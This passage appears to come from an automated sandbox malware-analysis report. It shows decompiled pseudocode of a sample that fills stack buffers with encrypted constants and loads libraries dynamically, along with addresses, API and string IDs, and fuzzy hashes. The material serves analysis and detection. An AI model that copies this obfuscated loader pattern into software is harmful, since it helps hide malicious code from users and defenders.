                  				intOrPtr _v356;
                  				intOrPtr _v360;
                  				intOrPtr _v364;
                  				intOrPtr _v368;
                  				intOrPtr _v372;
                  				intOrPtr _v376;
                  				intOrPtr _v380;
                  				intOrPtr _v384;
                  				intOrPtr _v388;
                  				intOrPtr _v392;
                  				intOrPtr _v396;
                  				intOrPtr _v400;
                  				intOrPtr _v404;
                  				intOrPtr _v408;
                  				intOrPtr _v412;
                  				intOrPtr _v416;
                  				intOrPtr _v420;
                  				intOrPtr _v424;
                  				intOrPtr _v428;
                  				intOrPtr _v432;
                  				intOrPtr _v436;
                  				intOrPtr _v440;
                  				intOrPtr _v444;
                  				intOrPtr _v448;
                  				intOrPtr _v452;
                  				intOrPtr _v456;
                  				intOrPtr _v460;
                  				intOrPtr _v464;
                  				intOrPtr _v468;
                  				intOrPtr _v472;
                  				intOrPtr _v476;
                  				intOrPtr _v480;
                  				intOrPtr _v484;
                  				intOrPtr _v488;
                  				intOrPtr _v492;
                  				intOrPtr _v496;
                  				intOrPtr _v500;
                  				intOrPtr _v504;
                  				intOrPtr _v508;
                  				intOrPtr _v512;
                  				intOrPtr _v516;
                  				intOrPtr _v520;
                  				intOrPtr _v524;
                  				intOrPtr _v528;
                  				intOrPtr _v532;
                  				intOrPtr _v536;
                  				intOrPtr _v540;
                  				intOrPtr _v544;
                  				intOrPtr _v548;
                  				intOrPtr _v552;
                  				intOrPtr _v556;
                  				intOrPtr _v560;
                  				intOrPtr _v564;
                  				intOrPtr _v568;
                  				intOrPtr _v572;
                  				intOrPtr _v576;
                  				intOrPtr _v580;
                  				intOrPtr _v584;
                  				intOrPtr _v588;
                  				intOrPtr _v592;
                  				intOrPtr _v596;
                  				intOrPtr _v600;
                  				intOrPtr _v604;
                  				intOrPtr _v608;
                  				intOrPtr _v612;
                  				intOrPtr _v616;
                  				intOrPtr _v620;
                  				intOrPtr _v624;
                  				intOrPtr _v628;
                  				intOrPtr _v632;
                  				intOrPtr _v636;
                  				intOrPtr _v640;
                  				intOrPtr _v644;
                  				intOrPtr _v648;
                  				intOrPtr _v652;
                  				intOrPtr _v656;
                  				intOrPtr _v660;
                  				intOrPtr _v664;
                  				intOrPtr _v668;
                  				intOrPtr _v672;
                  				intOrPtr _v676;
                  				intOrPtr _v680;
                  				intOrPtr _v684;
                  				intOrPtr _v688;
                  				intOrPtr _v692;
                  				intOrPtr _v696;
                  				intOrPtr _v700;
                  				intOrPtr _v704;
                  				intOrPtr _v708;
                  				intOrPtr _v712;
                  				intOrPtr _v716;
                  				intOrPtr _v720;
                  				intOrPtr _v724;
                  				intOrPtr _v728;
                  				intOrPtr _v732;
                  				intOrPtr _v736;
                  				intOrPtr _v740;
                  				intOrPtr _v744;
                  				intOrPtr _v748;
                  				intOrPtr _v752;
                  				intOrPtr _v756;
                  				intOrPtr _v760;
                  				intOrPtr _v764;
                  				intOrPtr _v768;
                  				intOrPtr _v772;
                  				intOrPtr _v776;
                  				intOrPtr _v780;
                  				intOrPtr _v784;
                  				intOrPtr _v788;
                  				intOrPtr _v792;
                  				intOrPtr _v796;
                  				intOrPtr _v800;
                  				intOrPtr _v804;
                  				intOrPtr _v808;
                  				intOrPtr _v812;
                  				intOrPtr _v816;
                  				intOrPtr _v820;
                  				intOrPtr _v824;
                  				intOrPtr _v828;
                  				intOrPtr _v832;
                  				intOrPtr _v836;
                  				intOrPtr _v840;
                  				intOrPtr _v844;
                  				intOrPtr _v848;
                  				intOrPtr _v852;
                  				intOrPtr _v856;
                  				intOrPtr _v860;
                  				intOrPtr _v864;
                  				intOrPtr _v868;
                  				intOrPtr _v872;
                  				intOrPtr _v876;
                  				intOrPtr _v880;
                  				intOrPtr _v884;
                  				intOrPtr _v888;
                  				intOrPtr _v892;
                  				intOrPtr _v896;
                  				intOrPtr _v900;
                  				intOrPtr _v904;
                  				intOrPtr _v908;
                  				intOrPtr _v912;
                  				intOrPtr _v916;
                  				intOrPtr _v920;
                  				intOrPtr _v924;
                  				intOrPtr _v928;
                  				intOrPtr _v932;
                  				intOrPtr _v936;
                  				intOrPtr _v940;
                  				intOrPtr _v944;
                  				intOrPtr _v948;
                  				intOrPtr _v952;
                  				intOrPtr _v956;
                  				intOrPtr _v960;
                  				intOrPtr _v964;
                  				intOrPtr _v968;
                  				intOrPtr _v972;
                  				intOrPtr _v976;
                  				intOrPtr _v980;
                  				intOrPtr _v984;
                  				intOrPtr _v988;
                  				intOrPtr _v992;
                  				intOrPtr _v996;
                  				intOrPtr _v1000;
                  				intOrPtr _v1004;
                  				intOrPtr _v1008;
                  				intOrPtr _v1012;
                  				intOrPtr _v1016;
                  				intOrPtr _v1020;
                  				intOrPtr _v1024;
                  				intOrPtr _v1028;
                  				intOrPtr _v1032;
                  				intOrPtr _v1036;
                  				intOrPtr _v1040;
                  				intOrPtr _v1044;
                  				intOrPtr _v1048;
                  				intOrPtr _v1052;
                  				intOrPtr _v1056;
                  				intOrPtr _v1060;
                  				intOrPtr _v1064;
                  				intOrPtr _v1068;
                  				intOrPtr _v1072;
                  				intOrPtr _v1076;
                  				intOrPtr _v1080;
                  				intOrPtr _v1084;
                  				intOrPtr _v1088;
                  				intOrPtr _v1092;
                  				intOrPtr _v1096;
                  				intOrPtr _v1100;
                  				intOrPtr _v1104;
                  				intOrPtr _v1108;
                  				intOrPtr _v1112;
                  				intOrPtr _v1116;
                  				intOrPtr _v1120;
                  				intOrPtr _v1124;
                  				intOrPtr _v1128;
                  				intOrPtr _v1132;
                  				intOrPtr _v1136;
                  				intOrPtr _v1140;
                  				intOrPtr _v1144;
                  				intOrPtr _v1148;
                  				intOrPtr _v1152;
                  				intOrPtr _v1156;
                  				intOrPtr _v1160;
                  				intOrPtr _v1164;
                  				intOrPtr _v1168;
                  				intOrPtr _v1172;
                  				intOrPtr _v1176;
                  				intOrPtr _v1180;
                  				intOrPtr _v1184;
                  				intOrPtr _v1188;
                  				intOrPtr _v1192;
                  				intOrPtr _v1196;
                  				intOrPtr _v1200;
                  				intOrPtr _v1204;
                  				intOrPtr _v1208;
                  				intOrPtr _v1212;
                  				intOrPtr _v1216;
                  				intOrPtr _v1220;
                  				intOrPtr _v1224;
                  				intOrPtr _v1228;
                  				intOrPtr _v1232;
                  				intOrPtr _v1236;
                  				intOrPtr _v1240;
                  				intOrPtr _v1244;
                  				intOrPtr _v1248;
                  				intOrPtr _v1252;
                  				intOrPtr _v1256;
                  				intOrPtr _v1260;
                  				intOrPtr _v1264;
                  				intOrPtr _v1268;
                  				intOrPtr _v1272;
                  				intOrPtr _v1276;
                  				intOrPtr _v1280;
                  				intOrPtr _v1284;
                  				intOrPtr _v1288;
                  				intOrPtr _v1292;
                  				intOrPtr _v1296;
                  				intOrPtr _v1300;
                  				intOrPtr _v1304;
                  				intOrPtr _v1308;
                  				intOrPtr _v1312;
                  				intOrPtr _v1316;
                  				intOrPtr _v1320;
                  				intOrPtr _v1324;
                  				intOrPtr _v1328;
                  				intOrPtr _v1332;
                  				intOrPtr _v1336;
                  				intOrPtr _v1340;
                  				intOrPtr _v1344;
                  				intOrPtr _v1348;
                  				intOrPtr _v1352;
                  				intOrPtr _v1356;
                  				intOrPtr _v1360;
                  				intOrPtr _v1364;
                  				intOrPtr _v1368;
                  				intOrPtr _v1372;
                  				intOrPtr _v1376;
                  				intOrPtr _v1380;
                  				intOrPtr _v1384;
                  				intOrPtr _v1388;
                  				intOrPtr _v1392;
                  				intOrPtr _v1396;
                  				intOrPtr _v1400;
                  				intOrPtr _v1404;
                  				intOrPtr _v1408;
                  				intOrPtr _v1412;
                  				intOrPtr _v1416;
                  				intOrPtr _v1420;
                  				intOrPtr _v1424;
                  				char _v1428;
                  
                  				_v1428 = 0x35afd9ed;
                  				_v1424 = 0xb2bb3fd1;
                  				_v1420 = 0xc54e001f;
                  				_v1416 = 0x464bd289;
                  				_v1412 = 0xa62e3cd5;
                  				_v1408 = 0x10828f30;
                  				_v1404 = 0xd759c3e6;
                  				_v1400 = 0x3226a1eb;
                  				_v1396 = 0x93d3719f;
                  				_v1392 = 0xff1d7368;
                  				_v1388 = 0x4cf80263;
                  				_v1384 = 0x1220b21a;
                  				_v1380 = 0x9e299973;
                  				_v1376 = 0x8c93726d;
                  				_v1372 = 0x388d0cca;
                  				_v1368 = 0x63dd4a40;
                  				_v1364 = 0x63312a98;
                  				_v1360 = 0xc54ade8b;
                  				_v1356 = 0x57b31f78;
                  				_v1352 = 0xbaef0446;
                  				_v1348 = 0xa5fb8b92;
                  				_v1344 = 0x7ac55a38;
                  				_v1340 = 0xa13c21f;
                  				_v1336 = 0x77bc5b0d;
                  				_v1332 = 0x6b48a641;
                  				_v1328 = 0xc939f5fe;
                  				_v1324 = 0xf80f5b16;
                  				_v1320 = 0xc75ec705;
                  				_v1316 = 0xdba5663;
                  				_v1312 = 0x4213a67f;
                  				_v1308 = 0x3de4493c;
                  				_v1304 = 0xd6231f80;
                  				_v1300 = 0x68067b7;
                  				_v1296 = 0xc082ec40;
                  				_v1292 = 0xa5d2a512;
                  				_v1288 = 0x5f226fcb;
                  				_v1284 = 0x9a62d466;
                  				_v1280 = 0x2dcc9250;
                  				_v1276 = 0x68432153;
                  				_v1272 = 0xe57fc7e;
                  				_v1268 = 0xf9c65141;
                  				_v1264 = 0x74e9465;
                  				_v1260 = 0xa6dac4aa;
                  				_v1256 = 0x35a3c1f;
                  				_v1252 = 0xa3662753;
                  				_v1248 = 0xf78554cb;
                  				_v1244 = 0xa9ba3f97;
                  				_v1240 = 0xa7034e35;
                  				_v1236 = 0xfefc68e9;
                  				_v1232 = 0xf512b31a;
                  				_v1228 = 0x7483c20;
                  				_v1224 = 0x36b5f632;
                  				_v1220 = 0x38c31e64;
                  				_v1216 = 0x4c62f726;
                  				_v1212 = 0x99ba6132;
                  				_v1208 = 0x323bd5bb;
                  				_v1204 = 0xd06b8129;
                  				_v1200 = 0x58ac925d;
                  				_v1196 = 0x14258239;
                  				_v1192 = 0x74c7fcd7;
                  				_v1188 = 0x5b658ef1;
                  				_v1184 = 0xfef3ed92;
                  				_v1180 = 0xd6897bdd;
                  				_v1176 = 0xe3ae805d;
                  				_v1172 = 0xd7dd3c6a;
                  				_v1168 = 0xcf62f53e;
                  				_v1164 = 0x10086fbc;
                  				_v1160 = 0xb950e66;
                  				_v1156 = 0x1f978099;
                  				_v1152 = 0xa5187c45;
                  				_v1148 = 0xe4f386b;
                  				_v1144 = 0xa997fe6d;
                  				_v1140 = 0x39d08a92;
                  				_v1136 = 0xfb10c42f;
                  				_v1132 = 0x58d93c66;
                  				_v1128 = 0x4cf30038;
                  				_v1124 = 0xa31aa9f3;
                  				_v1120 = 0xa932cf52;
                  				_v1116 = 0x2451a583;
                  				_v1112 = 0xeb831842;
                  				_v1108 = 0x59b79230;
                  				_v1104 = 0x47744230;
                  				_v1100 = 0xd450fcea;
                  				_v1096 = 0x1959a718;
                  				_v1092 = 0x6585da84;
                  				_v1088 = 0xf7b8a766;
                  				_v1084 = 0xa8e739d6;
                  				_v1080 = 0x25491a58;
                  				_v1076 = 0x41855178;
                  				_v1072 = 0xae9aad57;
                  				_v1068 = 0x913a6b1b;
                  				_v1064 = 0xf5bfdaf1;
                  				_v1060 = 0xe0413efd;
                  				_v1056 = 0x2a6692be;
                  				_v1052 = 0xae364f54;
                  				_v1048 = 0xa4910d06;
                  				_v1044 = 0xac37d2e2;
                  				_v1040 = 0x1f0ed562;
                  				_v1036 = 0xf8313c8;
                  				_v1032 = 0x1696917a;
                  				_v1028 = 0x4ba4c9c6;
                  				_v1024 = 0xca70992d;
                  				_v1020 = 0x88f129d4;
                  				_v1016 = 0x8986dfc9;
                  				_v1012 = 0x8077495d;
                  				_v1008 = 0x7f188a07;
                  				_v1004 = 0x7068997b;
                  				_v1000 = 0x5f73f18e;
                  				_v996 = 0x7079116d;
                  				_v992 = 0xf12893f0;
                  				_v988 = 0x2e1e137f;
                  				_v984 = 0x9c8a1308;
                  				_v980 = 0x63f7f786;
                  				_v976 = 0x82df7bd;
                  				_v972 = 0xb3225a87;
                  				_v968 = 0xd1bde73d;
                  				_v964 = 0x59885592;
                  				_v960 = 0xc427fd32;
                  				_v956 = 0x9d169c5c;
                  				_v952 = 0x6e01ebf2;
                  				_v948 = 0x9c5f68a9;
                  				_v944 = 0x559de137;
                  				_v940 = 0x45953cbd;
                  				_v936 = 0xd84853c;
                  				_v932 = 0x65edd287;
                  				_v928 = 0xef673b85;
                  				_v924 = 0x7fa3edf8;
                  				_v920 = 0x83ba664c;
                  				_v916 = 0xac287487;
                  				_v912 = 0x4d8c6e16;
                  				_v908 = 0xd6774e7a;
                  				_v904 = 0x6a742a14;
                  				_v900 = 0x7b41d554;
                  				_v896 = 0x3583a68f;
                  				_v892 = 0xb64620eb;
                  				_v888 = 0x968e295c;
                  				_v884 = 0x1f2a9f33;
                  				_v880 = 0x20c95888;
                  				_v876 = 0x3ad04588;
                  				_v872 = 0x1f3f3349;
                  				_v868 = 0x8bc63238;
                  				_v864 = 0x72dfdb8b;
                  				_v860 = 0x3c084d40;
                  				_v856 = 0xa03b21f2;
                  				_v852 = 0x975b711;
                  				_v848 = 0x66143377;
                  				_v844 = 0xb0ef4486;
                  				_v840 = 0x9536b870;
                  				_v836 = 0xad0c8488;
                  				_v832 = 0xfa93b301;
                  				_v828 = 0x625273d4;
                  				_v824 = 0x2130da0b;
                  				_v820 = 0x21682fc7;
                  				_v816 = 0x125bacd0;
                  				_v812 = 0x8d655941;
                  				_v808 = 0x7ea7e90a;
                  				_v804 = 0x998bb919;
                  				_v800 = 0x4a680a7;
                  				_v796 = 0x4dc5c9aa;
                  				_v792 = 0x6f4d8b33;
                  				_v788 = 0xfff2694d;
                  				_v784 = 0x7ad03f4c;
                  				_v780 = 0xec728f7e;
                  				_v776 = 0xbd5f0efc;
                  				_v772 = 0x39972492;
                  				_v768 = 0x8a22d400;
                  				_v764 = 0xc9e812c9;
                  				_v760 = 0xd9c8e7;
                  				_v756 = 0x783a029e;
                  				_v752 = 0xf55a1b2b;
                  				_v748 = 0x39a441d8;
                  				_v744 = 0xfddcd3b7;
                  				_v740 = 0xa8d3ee78;
                  				_v736 = 0xb71d00d8;
                  				_v732 = 0xd8f1a5e0;
                  				_v728 = 0x171f9db;
                  				_v724 = 0x608a96cb;
                  				_v720 = 0x5db98275;
                  				_v716 = 0x8e64ca5b;
                  				_v712 = 0x8224c5bb;
                  				_v708 = 0xf3e18a45;
                  				_v704 = 0x9fa69ab2;
                  				_v700 = 0x9858a1cb;
                  				_v696 = 0x20254080;
                  				_v692 = 0xc5a28d75;
                  				_v688 = 0xa7e533b4;
                  				_v684 = 0xb3f2eb4f;
                  				_v680 = 0xf3eab420;
                  				_v676 = 0xe26b573a;
                  				_v672 = 0x36939b06;
                  				_v668 = 0xce10ed67;
                  				_v664 = 0xaa9683c0;
                  				_v660 = 0x62293a60;
                  				_v656 = 0x1d84933a;
                  				_v652 = 0xad1d5e99;
                  				_v648 = 0x85c61e4e;
                  				_v644 = 0x5b995538;
                  				_v640 = 0x8d8b2cb;
                  				_v636 = 0xa9e61fda;
                  				_v632 = 0x9cd95a2d;
                  				_v628 = 0x8a651418;
                  				_v624 = 0x98b050c0;
                  				_v620 = 0x40e286e5;
                  				_v616 = 0x1619f260;
                  				_v612 = 0xb4bdd31f;
                  				_v608 = 0xb99d071c;
                  				_v604 = 0x125c63d2;
                  				_v600 = 0x2b37c664;
                  				_v596 = 0x82586a06;
                  				_v592 = 0x68bb79f8;
                  				_v588 = 0xde917f5e;
                  				_v584 = 0x13cb2094;
                  				_v580 = 0x4e37c720;
                  				_v576 = 0x6a7f746d;
                  				_v572 = 0xd082913f;
                  				_v568 = 0xbf74de13;
                  				_v564 = 0xa80f39b0;
                  				_v560 = 0xd992575e;
                  				_v556 = 0x68739177;
                  				_v552 = 0x3f37384b;
                  				_v548 = 0x18bc988d;
                  				_v544 = 0x46cd9d63;
                  				_v540 = 0xf4719ae3;
                  				_v536 = 0xf64f55e0;
                  				_v532 = 0x87d9f1a7;
                  				_v528 = 0x8f398c60;
                  				_v524 = 0x8cb94234;
                  				_v520 = 0xbbea7dd7;
                  				_v516 = 0xb9b8b1df;
                  				_v512 = 0xaa28a9fc;
                  				_v508 = 0xf0af87ff;
                  				_v504 = 0x8dd7ca67;
                  				_v500 = 0xe2b550c4;
                  				_v496 = 0xd32bc033;
                  				_v492 = 0x948a965f;
                  				_v488 = 0x8851f930;
                  				_v484 = 0x8f5ccc1;
                  				_v480 = 0x6164f669;
                  				_v476 = 0x33510924;
                  				_v472 = 0xcb43e698;
                  				_v468 = 0x6ce52a33;
                  				_v464 = 0xa66f015c;
                  				_v460 = 0x7718680d;
                  				_v456 = 0x9d1df3bc;
                  				_v452 = 0x2a00c920;
                  				_v448 = 0x91fb3000;
                  				_v444 = 0x10c81bc3;
                  				_v440 = 0xf8a75bf2;
                  				_v436 = 0x5ae0234a;
                  				_v432 = 0xf98cf7ec;
                  				_v428 = 0x5fc46df;
                  				_v424 = 0xca1b041b;
                  				_v420 = 0x2790b2c6;
                  				_v416 = 0x54daa301;
                  				_v412 = 0x138923a3;
                  				_v408 = 0x301c0cdf;
                  				_v404 = 0x38e0a856;
                  				_v400 = 0xf03451b0;
                  				_v396 = 0x99e431f5;
                  				_v392 = 0x11281ac6;
                  				_v388 = 0xcf2342ab;
                  				_v384 = 0x9eab3b39;
                  				_v380 = 0x9ae3e3f1;
                  				_v376 = 0x1a6c98f3;
                  				_v372 = 0x68813b1b;
                  				_v368 = 0x192d795a;
                  				_v364 = 0x40d247a5;
                  				_v360 = 0x72cd97b3;
                  				_v356 = 0x67b5cebb;
                  				_v352 = 0x72e3ccbf;
                  				_v348 = 0x6f4c2d5b;
                  				_v344 = 0x9e6a8356;
                  				_v340 = 0x49e92bba;
                  				_v336 = 0x4f743d77;
                  				_v332 = 0x153393e1;
                  				_v328 = 0x13614add;
                  				_v324 = 0x69ce03ee;
                  				_v320 = 0x854a7485;
                  				_v316 = 0x3d8d4e01;
                  				_v312 = 0x326ab68;
                  				_v308 = 0x1099a027;
                  				_v304 = 0xf0ad3f63;
                  				_v300 = 0xef67c339;
                  				_v296 = 0x48f2e773;
                  				_v292 = 0x20c73ca2;
                  				_v288 = 0x3ce286cb;
                  				_v284 = 0xc256b288;
                  				_v280 = 0x5313123f;
                  				_v276 = 0x298713bc;
                  				_v272 = 0xa00fff1e;
                  				_v268 = 0x712c154;
                  				_v264 = 0x8dfdabca;
                  				_v260 = 0x1b118de3;
                  				_v256 = 0x41128fd1;
                  				_v252 = 0x6de2b7e3;
                  				_v248 = 0x5024cd33;
                  				_v244 = 0x6abdc573;
                  				_v240 = 0x1c49177e;
                  				_v236 = 0x21386a4d;
                  				_v232 = 0x93f5651f;
                  				_v228 = 0xc73e8d48;
                  				_v224 = 0x3cac36f9;
                  				_v220 = 0x2d121512;
                  				_v216 = 0xa1b212f1;
                  				_v212 = 0x9129c71a;
                  				_v208 = 0x4db0cfdf;
                  				_v204 = 0xd654f2c6;
                  				_v200 = 0x16901ffd;
                  				_v196 = 0x81f89533;
                  				_v192 = 0x1b05c4c7;
                  				_v188 = 0x5eca920e;
                  				_v184 = 0x7724293;
                  				_v180 = 0x500c8610;
                  				_v176 = 0x55e5490d;
                  				_v172 = 0x62084e15;
                  				_v168 = 0xcf1eef0a;
                  				_v164 = 0xc774a676;
                  				_v160 = 0xae26a56e;
                  				_v156 = 0xcd297ae8;
                  				_v152 = 0x4142669a;
                  				_v148 = 0x7a1cc234;
                  				_v144 = 0x9b8e60b1;
                  				_v140 = 0xb4c16bb9;
                  				_v136 = 0x346d9962;
                  				_v132 = 0x84307aeb;
                  				_v128 = 0x7110f065;
                  				_v124 = 0x6a478088;
                  				_v120 = 0x5dc95d88;
                  				_v116 = 0x7073454d;
                  				_v112 = 0xacd929e4;
                  				_v108 = 0xde22b221;
                  				_v104 = 0x16e6327;
                  				_v100 = 0x9149dc8;
                  				_v96 = 0xe2880d33;
                  				_v92 = 0x2b179b1c;
                  				_v88 = 0xdea65404;
                  				_v84 = 0xf8875bcd;
                  				_v80 = 0x4b33baa9;
                  				_v76 = 0xb8f51a63;
                  				_v72 = 0x100f3977;
                  				_v68 = 0x86e5080f;
                  				_v64 = 0x39c92f99;
                  				_v60 = 0xd5b96d4e;
                  				_v56 = 0x4c99974;
                  				_v52 = 0x32225531;
                  				_v48 = 0xe94abe7a;
                  				_v44 = 0x45a4729;
                  				_v40 = 0xe5478378;
                  				_v36 = 0x67de8f40;
                  				_v32 = 0x9ef8aa84;
                  				_v28 = 0xb07d4bc5;
                  				_v24 = 0xa2696d4;
                  				_v20 = 0x57bd9265;
                  				_v16 = 0x5cb55045;
                  				_v12 = 0x686aeb99;
                  				_v8 = 0xd8fb779c;
                  				_t367 = E00401A52(0x412830, 0x72fc3a35);
                  				 *0x416500 = LoadLibraryW(_t358);
                  				L00401B09(_t367);
                  				_push(0x415f50);
                  				_push(0x15bf801c);
                  				return E004012FF( *0x416500,  &_v1428, 0x164);
                  			}
                  0x0040c19b
                  0x0040c1a5
                  0x0040c1af
                  0x0040c1b9
                  0x0040c1c3
                  0x0040c1cd
                  0x0040c1d7
                  0x0040c1e1
                  0x0040c1eb
                  0x0040c1f5
                  0x0040c1ff
                  0x0040c209
                  0x0040c213
                  0x0040c21d
                  0x0040c227
                  0x0040c231
                  0x0040c23b
                  0x0040c245
                  0x0040c24f
                  0x0040c259
                  0x0040c263
                  0x0040c26d
                  0x0040c277
                  0x0040c281
                  0x0040c28b
                  0x0040c295
                  0x0040c29f
                  0x0040c2a9
                  0x0040c2b3
                  0x0040c2bd
                  0x0040c2c7
                  0x0040c2d1
                  0x0040c2db
                  0x0040c2e5
                  0x0040c2ef
                  0x0040c2f9
                  0x0040c303
                  0x0040c30d
                  0x0040c317
                  0x0040c321
                  0x0040c32b
                  0x0040c335
                  0x0040c33f
                  0x0040c349
                  0x0040c353
                  0x0040c362
                  0x0040c371
                  0x0040c378
                  0x0040c37f
                  0x0040c386
                  0x0040c38d
                  0x0040c394
                  0x0040c39b
                  0x0040c3a2
                  0x0040c3a9
                  0x0040c3b0
                  0x0040c3b7
                  0x0040c3be
                  0x0040c3c5
                  0x0040c3cc
                  0x0040c3d3
                  0x0040c3da
                  0x0040c3e1
                  0x0040c3e8
                  0x0040c3ef
                  0x0040c3f6
                  0x0040c3fd
                  0x0040c404
                  0x0040c40b
                  0x0040c412
                  0x0040c419
                  0x0040c420
                  0x0040c427
                  0x0040c42e
                  0x0040c435
                  0x0040c43c
                  0x0040c443
                  0x0040c44a
                  0x0040c456
                  0x0040c461
                  0x0040c466
                  0x0040c477
                  0x0040c47c
                  0x0040c492

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 0040C459
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: IU$$Q3$0BtG$1U"2$3*l$8$:Wk$<I=$J#Z$K87?$MEsp$Mj8!$S!Ch$[-Lo$`:)b$w=tO
                  • API String ID: 1029625771-1041004230
                  • Opcode ID: a6161a9d4aafef99e67fba5a3ea7ffe1bb0866b570629b60a20c1477af4adfba
                  • Instruction ID: 9a6b7aac7a66a4a18d8d0bcd4942d35e4a44c5d677b151ec7ad78da889033333
                  • Opcode Fuzzy Hash: a6161a9d4aafef99e67fba5a3ea7ffe1bb0866b570629b60a20c1477af4adfba
                  • Instruction Fuzzy Hash: FD52A5F48567698BDB618F459E897CEBA74BB11304FA096C8C25D3B214CB740BC6CF89
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 549 409bfd-40a2c8 call 401a52 LoadLibraryW call 401b09 call 4012ff
                  C-Code - Quality: 82%
                  			E00409BFD(void* __eflags) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				intOrPtr _v40;
                  				intOrPtr _v44;
                  				intOrPtr _v48;
                  				intOrPtr _v52;
                  				intOrPtr _v56;
                  				intOrPtr _v60;
                  				intOrPtr _v64;
                  				intOrPtr _v68;
                  				intOrPtr _v72;
                  				intOrPtr _v76;
                  				intOrPtr _v80;
                  				intOrPtr _v84;
                  				intOrPtr _v88;
                  				intOrPtr _v92;
                  				intOrPtr _v96;
                  				intOrPtr _v100;
                  				intOrPtr _v104;
                  				intOrPtr _v108;
                  				intOrPtr _v112;
                  				intOrPtr _v116;
                  				intOrPtr _v120;
                  				intOrPtr _v124;
                  				intOrPtr _v128;
                  				intOrPtr _v132;
                  				intOrPtr _v136;
                  				intOrPtr _v140;
                  				intOrPtr _v144;
                  				intOrPtr _v148;
                  				intOrPtr _v152;
                  				intOrPtr _v156;
                  				intOrPtr _v160;
                  				intOrPtr _v164;
                  				intOrPtr _v168;
                  				intOrPtr _v172;
                  				intOrPtr _v176;
                  				intOrPtr _v180;
                  				intOrPtr _v184;
                  				intOrPtr _v188;
                  				intOrPtr _v192;
                  				intOrPtr _v196;
                  				intOrPtr _v200;
                  				intOrPtr _v204;
                  				intOrPtr _v208;
                  				intOrPtr _v212;
                  				intOrPtr _v216;
                  				intOrPtr _v220;
                  				intOrPtr _v224;
                  				intOrPtr _v228;
                  				intOrPtr _v232;
                  				intOrPtr _v236;
                  				intOrPtr _v240;
                  				intOrPtr _v244;
                  				intOrPtr _v248;
                  				intOrPtr _v252;
                  				intOrPtr _v256;
                  				intOrPtr _v260;
                  				intOrPtr _v264;
                  				intOrPtr _v268;
                  				intOrPtr _v272;
                  				intOrPtr _v276;
                  				intOrPtr _v280;
                  				intOrPtr _v284;
                  				intOrPtr _v288;
                  				intOrPtr _v292;
                  				intOrPtr _v296;
                  				intOrPtr _v300;
                  				intOrPtr _v304;
                  				intOrPtr _v308;
                  				intOrPtr _v312;
                  				intOrPtr _v316;
                  				intOrPtr _v320;
                  				intOrPtr _v324;
                  				intOrPtr _v328;
                  				intOrPtr _v332;
                  				intOrPtr _v336;
                  				intOrPtr _v340;
                  				intOrPtr _v344;
                  				intOrPtr _v348;
                  				intOrPtr _v352;
                  				intOrPtr _v356;
                  				intOrPtr _v360;
                  				intOrPtr _v364;
                  				intOrPtr _v368;
                  				intOrPtr _v372;
                  				intOrPtr _v376;
                  				intOrPtr _v380;
                  				intOrPtr _v384;
                  				intOrPtr _v388;
                  				intOrPtr _v392;
                  				intOrPtr _v396;
                  				intOrPtr _v400;
                  				intOrPtr _v404;
                  				intOrPtr _v408;
                  				intOrPtr _v412;
                  				intOrPtr _v416;
                  				intOrPtr _v420;
                  				intOrPtr _v424;
                  				intOrPtr _v428;
                  				intOrPtr _v432;
                  				intOrPtr _v436;
                  				intOrPtr _v440;
                  				intOrPtr _v444;
                  				intOrPtr _v448;
                  				intOrPtr _v452;
                  				intOrPtr _v456;
                  				intOrPtr _v460;
                  				intOrPtr _v464;
                  				intOrPtr _v468;
                  				intOrPtr _v472;
                  				intOrPtr _v476;
                  				intOrPtr _v480;
                  				intOrPtr _v484;
                  				intOrPtr _v488;
                  				intOrPtr _v492;
                  				intOrPtr _v496;
                  				intOrPtr _v500;
                  				intOrPtr _v504;
                  				intOrPtr _v508;
                  				intOrPtr _v512;
                  				intOrPtr _v516;
                  				intOrPtr _v520;
                  				intOrPtr _v524;
                  				intOrPtr _v528;
                  				intOrPtr _v532;
                  				intOrPtr _v536;
                  				intOrPtr _v540;
                  				intOrPtr _v544;
                  				intOrPtr _v548;
                  				intOrPtr _v552;
                  				intOrPtr _v556;
                  				intOrPtr _v560;
                  				intOrPtr _v564;
                  				intOrPtr _v568;
                  				intOrPtr _v572;
                  				intOrPtr _v576;
                  				intOrPtr _v580;
                  				intOrPtr _v584;
                  				intOrPtr _v588;
                  				intOrPtr _v592;
                  				intOrPtr _v596;
                  				intOrPtr _v600;
                  				intOrPtr _v604;
                  				intOrPtr _v608;
                  				intOrPtr _v612;
                  				intOrPtr _v616;
                  				intOrPtr _v620;
                  				intOrPtr _v624;
                  				intOrPtr _v628;
                  				intOrPtr _v632;
                  				intOrPtr _v636;
                  				intOrPtr _v640;
                  				intOrPtr _v644;
                  				intOrPtr _v648;
                  				intOrPtr _v652;
                  				intOrPtr _v656;
                  				intOrPtr _v660;
                  				intOrPtr _v664;
                  				intOrPtr _v668;
                  				intOrPtr _v672;
                  				intOrPtr _v676;
                  				intOrPtr _v680;
                  				intOrPtr _v684;
                  				intOrPtr _v688;
                  				intOrPtr _v692;
                  				intOrPtr _v696;
                  				intOrPtr _v700;
                  				char _v704;
                  
                  				_v704 = 0xf893fe23;
                  				_v700 = 0x96a93579;
                  				_v696 = 0x245c2aae;
                  				_v692 = 0xf26b8a8f;
                  				_v688 = 0x14c1b027;
                  				_v684 = 0xe0f0703e;
                  				_v680 = 0x88b3d872;
                  				_v676 = 0xa84285a9;
                  				_v672 = 0x47a43a6c;
                  				_v668 = 0xf852e92a;
                  				_v664 = 0xe5dfba2e;
                  				_v660 = 0xd7c59fdb;
                  				_v656 = 0xc3cbda99;
                  				_v652 = 0xcb41f718;
                  				_v648 = 0x6a64f5c4;
                  				_v644 = 0xdedf71d9;
                  				_v640 = 0xc4de6aec;
                  				_v636 = 0xfadcabb3;
                  				_v632 = 0x51f000a9;
                  				_v628 = 0x9adea939;
                  				_v624 = 0xb06b7dbe;
